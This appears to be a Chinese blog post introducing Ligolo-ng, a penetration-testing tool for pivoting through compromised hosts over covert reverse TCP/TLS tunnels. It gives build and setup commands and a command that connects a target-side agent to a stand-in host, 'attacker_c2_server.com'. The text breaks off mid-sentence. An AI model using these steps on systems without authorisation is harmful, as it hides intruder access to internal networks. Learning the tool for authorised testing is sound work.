Ligolo-ng是一款轻量级渗透测试工具,利用反向TCP/TLS连接创建隐蔽通信信道,无需SOCKS支持。它提供简单UI,自动化证书配置,并支持多平台代理,适用于网络安全测试人员。
关于Ligolo-ng
Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。
功能介绍
Tun接口(不再需要SOCKS);
简单的UI界面,支持选择代理和网络信息;
易于使用,易于安装;
基于Let’s Encrypt的自动化证书配置;
高性能(多路复用);
不需要高级权限;
套接字监听/代理绑定;
多平台代理支持;
工具构建
构建Ligolo-ng
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build agent for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
工具使用
首先,我们需要在目标设备上启动代理(无需特殊权限):
$ ./agent -connect attacker_c2_server.com:11601
此时,代理服务器上将出现一条会话链接:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
使用“session”命令选择代理:
ligolo-ng » session
? Speci
扫一扫
399
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
